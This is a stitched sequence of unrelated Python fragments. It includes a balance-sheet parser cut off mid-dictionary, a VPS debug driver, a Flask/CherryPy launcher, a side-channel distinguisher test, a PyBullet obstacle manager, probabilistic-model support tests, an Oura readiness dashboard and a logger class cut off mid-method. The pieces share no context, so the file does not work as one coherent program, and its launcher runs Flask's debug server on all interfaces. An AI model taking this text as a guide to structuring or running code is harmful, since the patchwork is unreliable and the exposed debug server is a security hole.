'totalCurrentAssets': to_float(totalCurrentAssets[idx]), 'loansAndPaymentsOnBehalf': to_float(loansAndPaymentsOnBehalf[idx]), 'availableForSaleFinancialAssets': to_float(availableForSaleFinancialAssets[idx]), 'heldToMaturityInvestment': to_float(heldToMaturityInvestment[idx]), 'longTermReceivables': to_float(longTermReceivables[idx]), 'longTermEquityInvestment': to_float(longTermEquityInvestment[idx]), 'investmentRealEstate': to_float(investmentRealEstate[idx]), 'NetfixedAssets': to_float(NetfixedAssets[idx]), 'constructionInProcess': to_float(constructionInProcess[idx]), 'engineerMaterial': to_float(engineerMaterial[idx]), 'fixedAssetsInLiquidation': to_float(fixedAssetsInLiquidation[idx]), 'productiveBiologicalAssets': 
to_float(productiveBiologicalAssets[idx]), 'nonProfitLivingAssets': to_float(nonProfitLivingAssets[idx]), 'oilAndGasAssets': to_float(oilAndGasAssets[idx]), 'intangibleAssets': to_float(intangibleAssets[idx]), 'developmentExpenditure': to_float(developmentExpenditure[idx]), 'goodwill': to_float(goodwill[idx]), 'longTermDeferredExpenses': to_float(longTermDeferredExpenses[idx]), 'deferredIncomeTaxAssets': to_float(deferredIncomeTaxAssets[idx]), 'OtherNonCurrentAssets': to_float(OtherNonCurrentAssets[idx]), 'nonCurrentAssets': to_float(nonCurrentAssets[idx]), 'totalAssets': to_float(totalAssets[idx]), 'shortTermBorrowing': to_float(shortTermBorrowing[idx]), 'transactionFinancialLiabilities': to_float(transactionFinancialLiabilities[idx]), 'billsPayable': to_float(billsPayable[idx]), 'accountsPayable': to_float(accountsPayable[idx]), 'accountsReceivedInAdvance': to_float(accountsReceivedInAdvance[idx]), 'handlingChargesAndCommissionsPayable': to_float(handlingChargesAndCommissionsPayable[idx]), 'employeeBenefitsPayable': to_float(employeeBenefitsPayable[idx]), 'taxesAndSurchargesPayable': to_float(taxesAndSurchargesPayable[idx]), 'interestPayable': to_float(interestPayable[idx]), 'dividendpayable': to_float(dividendpayable[idx]), 'otherPayables': to_float(otherPayables[idx]), 'withholdingExpenses': to_float(withholdingExpenses[idx]), 'deferredIncomeWithinOneYear': to_float(deferredIncomeWithinOneYear[idx]), 'shortTermDebenturesPayable': to_float(shortTermDebenturesPayable[idx]), 'nonCurrentLiabilitiesMaturingWithinOneYear': to_float(nonCurrentLiabilitiesMaturingWithinOneYear[idx]), 'otherCurrentLiability': to_float(otherCurrentLiability[idx]), 'totalCurrentLiabilities': to_float(totalCurrentLiabilities[idx]), 'LongTermBorrowing': to_float(LongTermBorrowing[idx]), 'bondPayable': to_float(bondPayable[idx]), 'longTermPayables': to_float(longTermPayables[idx]), 'longTermEmployeeBenefitsPayable': to_float(longTermEmployeeBenefitsPayable[idx]), 'specialPayable': 
to_float(specialPayable[idx]), 'expectedNonCurrentLiabilities': to_float(expectedNonCurrentLiabilities[idx]), 'deferredIncomeTaxLiabilities': to_float(deferredIncomeTaxLiabilities[idx]), 'longTermDeferredRevenue': to_float(longTermDeferredRevenue[idx]), 'otherNonCurrentLiabilities': to_float(otherNonCurrentLiabilities[idx]), 'totalNonCurrentLiabilities': to_float(totalNonCurrentLiabilities[idx]), 'totalLiabilities': to_float(totalLiabilities[idx]), 'totalShareCapital': to_float(totalShareCapital[idx]), 'capitalSurplus': to_float(capitalSurplus[idx]), 'treasuryStock': to_float(treasuryStock[idx]), 'otherComprehensiveIncome': to_float(otherComprehensiveIncome[idx]), 'theSpecialReserve': to_float(theSpecialReserve[idx]), 'surplusReserves': to_float(surplusReserves[idx]), 'generalRiskPreparation': to_float(generalRiskPreparation[idx]), 'undistributedProfits': to_float(undistributedProfits[idx]), 'bookValue': to_float(bookValue[idx]), 'minorityBookValue': to_float(minorityBookValue[idx]), 'totalBookValue': to_float(totalBookValue[idx]), 'totalLiabilitiesAndOwnersEquity': to_float(totalLiabilitiesAndOwnersEquity[idx])}
            the_data = the_json
            if (return_type == 'doc'):
                # Wrap in an elasticsearch-dsl style document.
                the_data = BalanceSheet(meta={'id': the_json['id']})
                fill_doc_type(the_data, the_json)
            if (report_period and is_same_date(report_period, reportDate[idx])):
                # Exact period requested: return the single record directly.
                return the_data
            result_list.append(the_data)
        if result_list:
            result_list = sorted(result_list, key=(lambda x: pd.Timestamp(x['reportPeriod'])))
        return result_list
def dtest():
    """Debug driver: create a single test VPS instance and configure it."""
    vps = VpsHerder(debug=True)
    name = 'test-2'
    provider, provider_args = vps.generate_do_conf()
    log = vps.log
    log.info('Creating instance...')
    log.info("\tClient name: '%s'", name)
    log.info("\tusing provider: '%s'", provider)
    log.info("\tkwargs: '%s'", provider_args)
    response = vps.cc.create(names=[name], provider=provider, **provider_args)
    print('Create response:', response)
    vps.configure_client(name, 0, provider=provider, provider_kwargs=provider_args)
    log.info('Instance created!')
def go():
    """Launch the web app: Flask's dev server with 'debug' in argv, CherryPy otherwise."""
    flags.IS_FLASK = True
    settings.MAX_DB_SESSIONS = 10
    import sys
    debug_mode = 'debug' in sys.argv
    if not debug_mode:
        print('Starting background thread')
    if debug_mode:
        print('Running in debug mode.')
        app.run(host='0.0.0.0', port=5001, debug=True)
        return
    print('Running in normal mode.')
    import cherrypy
    import logging

    def fixup_cherrypy_logs():
        # Stop cherrypy.* loggers from propagating (double-logging) to the root.
        # NOTE(review): defined but never invoked, mirroring the original code.
        for logger_name in logging.Logger.manager.loggerDict.keys():
            if logger_name.startswith('cherrypy.'):
                print('Fixing %s.' % logger_name)
                logging.getLogger(logger_name).propagate = 0

    # Mount the WSGI app on CherryPy and replace the default server instance.
    cherrypy.tree.graft(app, '/')
    cherrypy.server.unsubscribe()
    server = cherrypy._cpserver.Server()
    server.socket_host = '0.0.0.0'
    server.socket_port = 5001
    server.thread_pool = 8
    server.subscribe()
    if hasattr(cherrypy.engine, 'signal_handler'):
        cherrypy.engine.signal_handler.subscribe()
    cherrypy.engine.start()
    cherrypy.engine.block()
    print()
    print('Interrupt!')
def test_distinguisher_mixin_handles_processed_traces_count():
    """The distinguisher mixin must count how many traces update() consumed."""
    distinguisher = DumbDistinguisher()
    assert distinguisher.processed_traces == 0
    shape = (500, 16)
    data = np.random.randint(0, 255, shape, dtype='uint8')
    traces = np.random.randint(0, 255, shape, dtype='uint8')
    distinguisher.update(data=data, traces=traces)
    assert distinguisher.processed_traces == 500
class Invocation(BaseObject):
    """An invocation record with a parsed datetime accessor for its completion time.

    Fix: the original class body had a bare ``_completed.setter`` expression
    (NameError at class-creation time) and no ``@property`` on the getter —
    clearly a mangled property pair, restored here as
    ``@property`` / ``@latest_completed.setter``.
    """

    def __init__(self, api=None, id=None, latest_completed_at=None, status=None, status_code=None, **kwargs):
        self.api = api
        self.id = id
        self.latest_completed_at = latest_completed_at
        self.status = status
        self.status_code = status_code
        # Accept arbitrary extra fields from the API payload as attributes.
        for (key, value) in kwargs.items():
            setattr(self, key, value)
        # Attributes that were never set should not be flagged as dirty
        # (i.e. pending submission back to the API).
        for key in self.to_dict():
            if getattr(self, key) is None:
                try:
                    self._dirty_attributes.remove(key)
                except KeyError:
                    continue

    @property
    def latest_completed(self):
        """Return ``latest_completed_at`` parsed into a datetime, or None if unset."""
        if self.latest_completed_at:
            return dateutil.parser.parse(self.latest_completed_at)

    @latest_completed.setter
    def latest_completed(self, latest_completed):
        # Only overwrite the raw timestamp with a truthy value.
        if latest_completed:
            self.latest_completed_at = latest_completed
class ObstacleManager(object):
    """Spawns, tracks, updates and renders transient obstacle bodies in a
    PyBullet simulation. Obstacles expire once their `duration` runs out and
    are then removed from the physics world.
    """
    def __init__(self, pb_client, dt, v_up_env, visualization=False):
        # pb_client: PyBullet client used for all physics calls.
        # dt: simulation timestep used to decay each obstacle's remaining lifetime.
        # v_up_env: environment "up" vector — assumed to be a unit vector (TODO confirm).
        self.pb_client = pb_client
        self.obstacles = []
        self.dt = dt
        self.v_up_env = v_up_env
        if visualization:
            # Rendering modules are imported lazily into *module* scope only when
            # visualization is requested, so headless runs avoid the OpenGL dependency.
            # NOTE(review): render() below accesses these through `rm.*`, not the
            # names imported here — verify which binding is actually used.
            global gl_render, bullet_render, gl
            from basecode.render import gl_render
            from basecode.bullet import bullet_render
            import OpenGL.GL as gl
    def clear(self):
        """Remove every tracked obstacle from the physics world and forget it."""
        for obs in self.obstacles:
            self.pb_client.removeBody(obs.body_id)
        self.obstacles = []
    def launch(self, obstacle):
        """Create a rigid body for `obstacle` in PyBullet and start tracking it.

        Raises NotImplementedError for shapes other than BOX and SPHERE.
        """
        p = self.pb_client
        size = obstacle.size
        if (obstacle.shape == Shape.BOX):
            # PyBullet boxes take half-extents, hence the 0.5 factors.
            colShapeId = p.createCollisionShape(p.GEOM_BOX, halfExtents=[(0.5 * size[0]), (0.5 * size[1]), (0.5 * size[2])])
        elif (obstacle.shape == Shape.SPHERE):
            colShapeId = p.createCollisionShape(p.GEOM_SPHERE, radius=size[0])
        else:
            raise NotImplementedError
        body_id = p.createMultiBody(baseMass=obstacle.mass, baseCollisionShapeIndex=colShapeId, basePosition=obstacle.p, baseOrientation=obstacle.Q)
        p.resetBaseVelocity(body_id, obstacle.v, obstacle.w)
        # linkIndex -1 targets the base link of the multibody.
        p.changeDynamics(body_id, (- 1), lateralFriction=obstacle.lateral_friction, spinningFriction=obstacle.spinning_friction, restitution=obstacle.restitution, linearDamping=obstacle.linear_damping, angularDamping=obstacle.angular_damping)
        obstacle.body_id = body_id
        self.obstacles.append(obstacle)
    def throw(self, pos_target, num=1, duration=2.0, shape=Shape.BOX, vel=8.0, r_out=2.0, r_in=0.2, mass=2.0, size=(0.2 * np.ones(3)), h_min=0.5):
        """Launch `num` obstacles toward `pos_target`.

        Each obstacle starts on a sphere of radius r_out around the target
        (clamped to at least h_min along the up axis) and is aimed at a random
        point within radius r_in of the target, with speed `vel` and a random
        orientation.
        NOTE(review): `size` is a mutable (ndarray) default shared across calls —
        safe only if callers never mutate it; verify.
        """
        assert (r_out > r_in)
        for _ in range(num):
            d_out = math.random_unit_vector()
            d_in = math.random_unit_vector()
            p_from = (pos_target + (r_out * d_out))
            # Clamp the launch point's height (component along v_up_env) to h_min.
            p_projected_h = math.projectionOnVector(p_from, self.v_up_env)
            h_cliped = max(np.linalg.norm(p_projected_h), h_min)
            p_from = ((p_from - p_projected_h) + (h_cliped * self.v_up_env))
            p_to = (pos_target + (r_in * d_in))
            v_dir = (p_to - p_from)
            v_dir = (v_dir / np.linalg.norm(v_dir))
            p = p_from
            # Random orientation: random axis, random angle in [-pi, pi).
            Q = conversions.A2Q((math.random_unit_vector() * np.random.uniform((- np.pi), np.pi)))
            v = (vel * v_dir)
            w = np.zeros(3)
            obs = Obstacle('', duration, shape, mass, size, p, Q, v, w)
            self.launch(obs)
    def update(self):
        """Advance obstacle lifetimes by dt; sync poses from PyBullet; drop expired ones."""
        deleted_idx = []
        for i in range(len(self.obstacles)):
            obs = self.obstacles[i]
            obs.duration -= self.dt
            if (obs.duration <= 0.0):
                self.pb_client.removeBody(obs.body_id)
                deleted_idx.append(i)
            else:
                # Pull the latest base pose/velocity back into the obstacle record.
                (p, Q, v, w) = bu.get_base_pQvw(self.pb_client, obs.body_id)
                (obs.p, obs.Q, obs.v, obs.w) = (p, Q, v, w)
        self.obstacles = filter_list_by_index(self.obstacles, deleted_idx, positive=False)
    def render(self):
        """Draw each obstacle, fading it out over its last `decay_start` seconds."""
        for obs in self.obstacles:
            decay_start = 0.5
            # Alpha ramps linearly from 1 down to 0 as duration approaches zero.
            alpha = min(1.0, ((1.0 / decay_start) * obs.duration))
            c = obs.color
            T = conversions.Qp2T(obs.Q, obs.p)
            rm.gl.glPushMatrix()
            rm.gl_render.glTransform(T)
            if (obs.shape == Shape.BOX):
                geom_type = self.pb_client.GEOM_BOX
            elif (obs.shape == Shape.SPHERE):
                geom_type = self.pb_client.GEOM_SPHERE
            else:
                raise NotImplementedError
            rm.bullet_render.render_geom(geom_type=geom_type, geom_size=obs.size, color=[c[0], c[1], c[2], alpha])
            rm.bullet_render.render_geom_info(geom_type=geom_type, geom_size=obs.size)
            rm.gl.glPopMatrix()
class NodeSupportTest(unittest.TestCase):
    """Tests for ComputeSupport: enumerating the support of BMG graph nodes."""
    def assertEqual(self, x: Any, y: Any) -> None:
        # Override: compare Tensors element-wise instead of by identity/__eq__.
        if (isinstance(x, Tensor) and isinstance(y, Tensor)):
            self.assertTrue(tensor_equality(x, y))
        else:
            super().assertEqual(x, y)
    def test_node_supports(self) -> None:
        """Support of arithmetic/boolean combinations of finite-support RVs."""
        self.maxDiff = None
        rt = BMGRuntime()
        rt.accumulate_graph([and1(), negexp1()], {})
        cs = ComputeSupport()
        expected_flip1 = '\ntensor(0.)\ntensor(1.)'
        observed_flip1 = str(cs[rt._rv_to_node(flip1(0))])
        self.assertEqual(expected_flip1.strip(), observed_flip1.strip())
        expected_sum1 = '\ntensor(1.)\ntensor(2.)'
        observed_sum1 = str(cs[rt._rv_to_node(sum1())])
        self.assertEqual(expected_sum1.strip(), observed_sum1.strip())
        expected_prod1 = '\ntensor(1.)\ntensor(2.)\ntensor(4.)'
        observed_prod1 = str(cs[rt._rv_to_node(prod1())])
        self.assertEqual(expected_prod1.strip(), observed_prod1.strip())
        expected_pow1 = '\ntensor(1.)\ntensor(16.)\ntensor(2.)\ntensor(256.)\ntensor(4.)\n'
        observed_pow1 = str(cs[rt._rv_to_node(pow1())])
        self.assertEqual(expected_pow1.strip(), observed_pow1.strip())
        expected_ge1 = '\ntensor(False)\ntensor(True)\n'
        observed_ge1 = str(cs[rt._rv_to_node(ge1())])
        self.assertEqual(expected_ge1.strip(), observed_ge1.strip())
        expected_and1 = expected_ge1
        observed_and1 = str(cs[rt._rv_to_node(and1())])
        self.assertEqual(expected_and1.strip(), observed_and1.strip())
        # negexp1's support is compared as a sorted list of int strings
        # because enumeration order is not fixed.
        expected_exp1 = "['-2', '-54', '-7']"
        results = [str(int(t)) for t in cs[rt._rv_to_node(negexp1())]]
        results.sort()
        self.assertEqual(expected_exp1.strip(), str(results).strip())
    def test_bernoulli_support(self) -> None:
        """A 1x2 Bernoulli sample has the four possible 0/1 tensors as support."""
        self.maxDiff = None
        rt = BMGRuntime()
        rt.accumulate_graph([flip2(0)], {})
        sample = rt._rv_to_node(flip2(0))
        s = ComputeSupport()
        observed = str(s[sample])
        expected = '\ntensor([[0., 0.]])\ntensor([[0., 1.]])\ntensor([[1., 0.]])\ntensor([[1., 1.]])'
        self.assertEqual(expected.strip(), observed.strip())
    def test_categorical_support(self) -> None:
        """Categorical supports enumerate category products; huge ones become TooBig."""
        self.maxDiff = None
        rt = BMGRuntime()
        rt.accumulate_graph([cat3(), cat2_3(), cat8_3()], {})
        s = ComputeSupport()
        c3 = rt._rv_to_node(cat3())
        observed_c3 = str(s[c3])
        expected_c3 = '\ntensor(0)\ntensor(1)\ntensor(2)\n'
        self.assertEqual(expected_c3.strip(), observed_c3.strip())
        c23 = rt._rv_to_node(cat2_3())
        observed_c23 = str(s[c23])
        expected_c23 = '\ntensor([0, 0])\ntensor([0, 1])\ntensor([0, 2])\ntensor([1, 0])\ntensor([1, 1])\ntensor([1, 2])\ntensor([2, 0])\ntensor([2, 1])\ntensor([2, 2])\n'
        self.assertEqual(expected_c23.strip(), observed_c23.strip())
        # 8 categories x 3 elements exceeds the enumeration limit.
        c83 = rt._rv_to_node(cat8_3())
        observed_c23 = s[c83]
        self.assertTrue((observed_c23 is TooBig))
    def test_stochastic_tensor_support(self) -> None:
        """Support of a tensor built from a constant plus three binary RVs."""
        self.maxDiff = None
        rt = BMGRuntime()
        rt.accumulate_graph([to_tensor()], {})
        tm = rt._rv_to_node(to_tensor())
        s = ComputeSupport()
        observed = str(s[tm])
        expected = '\ntensor([2.5000, 0.0000, 0.0000, 0.0000])\ntensor([2.5000, 0.0000, 0.0000, 1.0000])\ntensor([2.5000, 0.0000, 1.0000, 0.0000])\ntensor([2.5000, 0.0000, 1.0000, 1.0000])\ntensor([2.5000, 1.0000, 0.0000, 0.0000])\ntensor([2.5000, 1.0000, 0.0000, 1.0000])\ntensor([2.5000, 1.0000, 1.0000, 0.0000])\ntensor([2.5000, 1.0000, 1.0000, 1.0000])\n'
        self.assertEqual(expected.strip(), observed.strip())
    def test_infinite_support(self) -> None:
        """Continuous distributions (Normal) report the Infinite sentinel."""
        self.maxDiff = None
        rt = BMGRuntime()
        rt.accumulate_graph([normal()], {})
        sample = rt._rv_to_node(normal())
        s = ComputeSupport()
        observed = s[sample]
        self.assertEqual(Infinite, observed)
    def test_switch_support(self) -> None:
        """Switch nodes: infinite if any branch is infinite, else the branch union."""
        self.maxDiff = None
        rt = BMGRuntime()
        rt.accumulate_graph([switch_inf(), switch_4()], {})
        s = ComputeSupport()
        switch_inf_sample = rt._rv_to_node(switch_inf())
        observed_inf = s[switch_inf_sample]
        self.assertEqual(Infinite, observed_inf)
        switch_4_sample = rt._rv_to_node(switch_4())
        observed_4 = str(s[switch_4_sample])
        expected_4 = '\ntensor(0.)\ntensor(1.)\ntensor(2)\ntensor(3)\n'
        self.assertEqual(expected_4.strip(), observed_4.strip())
class ModuleBuild(Build):
    """Build subclass for module content; NVR components come from Koji metadata."""

    __mapper_args__ = {'polymorphic_identity': ContentType.module}

    def nvr_name(self):
        """Name component of the build's NVR, as reported by Koji."""
        kojiinfo = self._get_kojiinfo()
        return kojiinfo['name']

    def nvr_version(self):
        """Version component of the build's NVR, as reported by Koji."""
        kojiinfo = self._get_kojiinfo()
        return kojiinfo['version']

    def nvr_release(self):
        """Release component of the build's NVR, as reported by Koji."""
        kojiinfo = self._get_kojiinfo()
        return kojiinfo['release']
class _A100(_A100_Base):
    """A100 GPU device exposing its supported partition profiles.

    The profile strings follow the '<slices>g.<memory>gb' naming — presumably
    NVIDIA MIG (Multi-Instance GPU) profiles; verify against _A100_Base.partitioned.
    """
    partition_1g_5gb = _A100_Base.partitioned('1g.5gb')
    partition_2g_10gb = _A100_Base.partitioned('2g.10gb')
    partition_3g_20gb = _A100_Base.partitioned('3g.20gb')
    partition_4g_20gb = _A100_Base.partitioned('4g.20gb')
    partition_7g_40gb = _A100_Base.partitioned('7g.40gb')
def generate_readiness_modal_summary(days=7):
    """Build the Dash layout for the readiness modal: last-`days` readiness,
    HRV and RHR charts with linear-trend insights, plus correlation and
    group-by sections.

    Returns a single-element list containing the assembled html.Div tree.
    """
    # Window start: `days` days before today.
    date = (datetime.now().date() - timedelta(days=days))
    # Readiness summaries and sleep-derived HRV/RHR, both indexed by report_date.
    df = pd.read_sql(sql=app.session.query(ouraReadinessSummary).filter((ouraReadinessSummary.report_date > date)).statement, con=engine, index_col='report_date')
    hrv_df = pd.read_sql(sql=app.session.query(ouraSleepSummary.report_date, ouraSleepSummary.rmssd, ouraSleepSummary.hr_lowest).filter((ouraSleepSummary.report_date > date)).statement, con=engine, index_col='report_date')
    app.session.remove()
    df = df.merge(hrv_df, how='left', left_index=True, right_index=True)
    if (len(df) > 1):
        # Fit a straight line through HRV (rmssd) and RHR (hr_lowest) over the
        # window; the slope sign drives the wording of the insight text.
        (hrv_slope, hrv_intercept) = np.polyfit(df.reset_index().index, df['rmssd'], 1)
        hrv_insight = 'Your {} HRV trend implies that {}'.format(('downward' if (hrv_slope < 0) else 'upwards'), ('you should keep an eye on your recovery status' if (hrv_slope < 0) else "you've recovered well"))
        (rhr_slope, rhr_intercept) = np.polyfit(df.reset_index().index, df['hr_lowest'], 1)
        rhr_insight = 'Your {} RHR trend implies that {}'.format(('downward' if (rhr_slope < 0) else 'upwards'), ("you've recovered well" if (rhr_slope < 0) else 'something may be challenging your recovery'))
    else:
        # Not enough points for a regression; flat zero trend lines.
        (hrv_slope, hrv_intercept) = (0, 0)
        (rhr_slope, rhr_intercept) = (0, 0)
        hrv_insight = 'Not enough data to calculate insights from your HRV trend'
        rhr_insight = 'Not enough data to calculate insights from your RHR trend'
    # Trend series evaluated at each positional index of the window.
    df['hrv_trend'] = ((df.reset_index().index * hrv_slope) + hrv_intercept)
    df['rhr_trend'] = ((df.reset_index().index * rhr_slope) + rhr_intercept)
    # Bar chart of daily readiness scores.
    readiness_last_7_graph = dcc.Graph(config={'displayModeBar': False}, figure={'data': [go.Bar(name='Readiness', x=df.index, y=df['score'], yaxis='y', text=df['score'], hoverinfo='text', hovertext=['Readiness: <b>{:.0f}'.format(x) for x in df['score']], textposition='auto', marker={'color': light_blue})], 'layout': go.Layout(height=300, font=dict(size=10, color=white), xaxis=dict(showline=True, color=white, showticklabels=True, showgrid=False, tickvals=df.index, tickformat='%a'), yaxis=dict(showticklabels=True, showgrid=True, gridcolor='rgb(66,66,66)', color=white, tickformat=',d'), showlegend=False, margin={'l': 20, 'b': 20, 't': 0, 'r': 0})})
    # HRV line chart: daily values, fitted trend line, and a dotted mean line.
    hrv_last_7_graph = dcc.Graph(config={'displayModeBar': False}, figure={'data': [go.Scatter(name='HR Variability', x=df.index, y=round(df['rmssd']), yaxis='y', text=['HRV: <b>{:.0f} ms'.format(x) for x in df['rmssd']], hoverinfo='text', mode='lines+markers', line={'dash': 'dot', 'color': teal, 'width': 2}, showlegend=False, marker={'size': 5}), go.Scatter(name='HRV Trend', x=df.index, y=df['hrv_trend'], yaxis='y', hoverinfo='none', mode='lines', line={'color': teal, 'width': 2}, showlegend=False), go.Scatter(name='Average', x=df.index, y=[df['rmssd'].mean() for x in df.index], mode='lines+text', text=[('Avg: <b>{:.0f} ms'.format(df['rmssd'].mean()) if (x == df.index.max()) else '') for x in df.index], textfont=dict(size=11, color='rgb(150,150,150)'), textposition='top left', hoverinfo='none', line={'dash': 'dot', 'color': 'rgb(150,150,150)', 'width': 1}, showlegend=False)], 'layout': go.Layout(height=300, font=dict(size=10, color=white), xaxis=dict(showline=True, color=white, showticklabels=True, showgrid=False, tickvals=df.index, tickformat='%a'), yaxis=dict(showticklabels=True, showgrid=True, gridcolor='rgb(66,66,66)', color=white, tickformat=',d'), showlegend=False, margin={'l': 20, 'b': 20, 't': 0, 'r': 0})})
    # RHR line chart: same structure as the HRV chart.
    rhr_last_7_graph = dcc.Graph(config={'displayModeBar': False}, figure={'data': [go.Scatter(name='Resting HR', x=df.index, y=round(df['hr_lowest']), yaxis='y', text=['RHR: <b>{:.0f} bpm'.format(x) for x in df['hr_lowest']], hoverinfo='text', mode='lines+markers', line={'dash': 'dot', 'color': white, 'width': 2}, showlegend=False, marker={'size': 5}), go.Scatter(name='RHR Trend', x=df.index, y=df['rhr_trend'], yaxis='y', hoverinfo='none', mode='lines', line={'color': white, 'width': 2}, showlegend=False), go.Scatter(name='Average', x=df.index, y=[df['hr_lowest'].mean() for x in df.index], mode='lines+text', text=[('Avg: <b>{:.0f} bpm'.format(df['hr_lowest'].mean()) if (x == df.index.max()) else '') for x in df.index], textfont=dict(size=11, color='rgb(150,150,150)'), textposition='top left', hoverinfo='none', line={'dash': 'dot', 'color': 'rgb(150,150,150)', 'width': 1}, showlegend=False)], 'layout': go.Layout(height=300, font=dict(size=10, color=white), xaxis=dict(showline=True, color=white, showticklabels=True, showgrid=False, tickvals=df.index, tickformat='%a'), yaxis=dict(showticklabels=True, showgrid=True, gridcolor='rgb(66,66,66)', color=white, tickformat=',d'), showlegend=False, margin={'l': 20, 'b': 20, 't': 0, 'r': 0})})
    # Assemble: top row of the three charts, bottom row with correlations and group-by controls.
    return [html.Div(id='readiness-modal-last-7-container', className='row align-items-center text-center mb-2', style={'whiteSpace': 'normal'}, children=[html.Div(id='readiness-score-last-7', className='col-lg-4', children=[html.Div(id='readiness-score-last-7-title', children=[html.P('Your average readiness score for the last 7 days is {:.0f}'.format(df['score'].mean()))]), html.Div(id='readiness-score-last-7-chart', children=[readiness_last_7_graph])]), html.Div(id='hrv-score-last-7', className='col-lg-4', children=[html.Div(id='hrv-score-last-7-title', children=[html.P(hrv_insight)]), html.Div(id='hrv-score-last-7-chart', children=[hrv_last_7_graph])]), html.Div(id='rhr-score-last-7', className='col-lg-4', children=[html.Div(id='rhr-score-last-7-title', children=[html.P(rhr_insight)]), html.Div(id='rhr-score-last-7-chart', children=[rhr_last_7_graph])])]), html.Div(className='row', children=[html.Div(id='readiness-score-correlations', className='col-lg-6', children=[html.Div(id='readiness-score-correlation-title', className='col-lg-12 text-center', children=[html.P('Readiness Score Correlations (L6M)')]), html.Div(id='readiness-score-correlation-chart', className='col-lg-12', children=[generate_correlation_table(10, 'Readiness score', 180)])]), html.Div(className='col-lg-6', children=[html.Div(className='row align-items-center text-center', children=[html.Div(id='readiness-groupby-controls', className='col-lg-12 mb-2 mt-2', children=[dbc.Button('Year', id='readiness-year-button', n_clicks=0, size='sm', className='mr-3'), dbc.Button('Month', id='readiness-month-button', n_clicks=0, size='sm', className='mr-3'), dbc.Button('Week', id='readiness-week-button', n_clicks=0, size='sm', className='mr-3'), dbc.Button('Day', id='readiness-day-button', size='sm')])]), html.Div(className='row', children=[html.Div(className='col-lg-12', children=[dbc.Spinner(color='info', children=[dcc.Graph(id='readiness-modal-full-chart', config={'displayModeBar': False})])])])])])]
def hash_node(node):
    """Return a hash of a trie node's serialization, or None where no hash applies.

    LeafNode -> hash of its serialization.
    BranchNode -> hash of its serialization, or None when it serializes to None.
    None -> None (an absent node has no hash).

    Raises:
        TypeError: for any other node type (was a bare ``Exception``; a
        type-dispatch failure is idiomatically a TypeError, which remains
        catchable by existing ``except Exception`` callers).
    """
    if isinstance(node, LeafNode):
        return hash(node.serialize())
    elif isinstance(node, BranchNode):
        serialized = node.serialize()
        return None if serialized is None else hash(serialized)
    elif node is None:
        return None
    else:
        raise TypeError('Bad node type: %r' % type(node))
class Logger():
    """Domain-aware logger with separate info and debug channels.

    Fixed levels FATAL/TRACEBACK/ERROR/WARNING plus dynamically generated
    INFO1..INFO<info_max> and DEBUG1..DEBUG<debug_max> constants and their
    convenience methods (info1(), debug1(), ...). Records are routed per
    "domain" — a dotted module[.class][.function] path, matched with prefix
    or fnmatch wildcards — to one or more LogTarget objects.
    """
    # Sentinel level values. ALL selects every level in set/add/del calls.
    ALL = (- 5)
    NOTHING = (- 4)
    FATAL = (- 3)
    TRACEBACK = (- 2)
    ERROR = (- 1)
    WARNING = 0
    # Default shared log targets (class-level, shared by all instances).
    stdout = _StdoutLog()
    stderr = _StderrLog()
    syslog = _SyslogLog()
    def __init__(self, info_max=5, debug_max=10):
        """Set up level tables, generate INFO*/DEBUG* members and default routing.

        Raises ValueError if info_max < 1 or debug_max < 0.
        """
        self._level = {}
        self._debug_level = {}
        self._format = ''
        self._date_format = ''
        self._label = {}
        self._debug_label = {}
        self._logging = {}
        self._debug_logging = {}
        self._domains = {}
        self._debug_domains = {}
        if (info_max < 1):
            raise ValueError(('Logger: info_max %d is too low' % info_max))
        if (debug_max < 0):
            raise ValueError(('Logger: debug_max %d is too low' % debug_max))
        self.NO_INFO = self.WARNING
        self.INFO_MAX = info_max
        self.NO_DEBUG = 0
        self.DEBUG_MAX = debug_max
        self.setInfoLogLabel(self.FATAL, 'FATAL ERROR: ')
        self.setInfoLogLabel(self.TRACEBACK, '')
        self.setInfoLogLabel(self.ERROR, 'ERROR: ')
        self.setInfoLogLabel(self.WARNING, 'WARNING: ')
        # Generate INFO<n> constants and info<n>() helpers; the immediately
        # invoked outer lambda binds self and the current level by value.
        for _level in range(1, (self.INFO_MAX + 1)):
            setattr(self, ('INFO%d' % _level), _level)
            self.setInfoLogLabel(_level, '')
            setattr(self, ('info%d' % _level), (lambda self, x: (lambda message, *args, **kwargs: self.info(x, message, *args, **kwargs)))(self, _level))
        # Same generation scheme for DEBUG<n> / debug<n>().
        for _level in range(1, (self.DEBUG_MAX + 1)):
            setattr(self, ('DEBUG%d' % _level), _level)
            self.setDebugLogLabel(_level, ('DEBUG%d: ' % _level))
            setattr(self, ('debug%d' % _level), (lambda self, x: (lambda message, *args, **kwargs: self.debug(x, message, *args, **kwargs)))(self, _level))
        # Defaults: INFO1 verbosity, no debug, errors to stderr, info/debug to stdout.
        self.setInfoLogLevel(self.INFO1)
        self.setDebugLogLevel(self.NO_DEBUG)
        self.setFormat('%(label)s%(message)s')
        self.setDateFormat('%d %b %Y %H:%M:%S')
        self.setInfoLogging('*', self.stderr, [self.FATAL, self.ERROR, self.WARNING])
        self.setInfoLogging('*', self.stdout, [i for i in range(self.INFO1, (self.INFO_MAX + 1))])
        self.setDebugLogging('*', self.stdout, [i for i in range(1, (self.DEBUG_MAX + 1))])
    def close(self):
        """Close every target registered for any info level."""
        for level in range(self.FATAL, (self.DEBUG_MAX + 1)):
            if (level not in self._logging):
                continue
            for (dummy, target, dummy) in self._logging[level]:
                target.close()
    def getInfoLogLevel(self, domain='*'):
        """Return the info level for `domain`, or NOTHING if none is set."""
        self._checkDomain(domain)
        if (domain in self._level):
            return self._level[domain]
        return self.NOTHING
    def setInfoLogLevel(self, level, domain='*'):
        """Set the info level for `domain`, clamped to [NOTHING, INFO_MAX]."""
        self._checkDomain(domain)
        if (level < self.NOTHING):
            level = self.NOTHING
        if (level > self.INFO_MAX):
            level = self.INFO_MAX
        self._level[domain] = level
    def getDebugLogLevel(self, domain='*'):
        """Return the debug level for `domain`, or NO_DEBUG if none is set."""
        self._checkDomain(domain)
        if (domain in self._debug_level):
            return (self._debug_level[domain] + self.NO_DEBUG)
        return self.NO_DEBUG
    def setDebugLogLevel(self, level, domain='*'):
        """Set the debug level for `domain`, clamped to [0, DEBUG_MAX]."""
        self._checkDomain(domain)
        if (level < 0):
            level = 0
        if (level > self.DEBUG_MAX):
            level = self.DEBUG_MAX
        self._debug_level[domain] = (level - self.NO_DEBUG)
    def getFormat(self):
        """Return the record format string (%-style with named fields)."""
        return self._format
    def setFormat(self, _format):
        """Set the record format string; fields: label, message, domain, class, etc."""
        self._format = _format
    def getDateFormat(self):
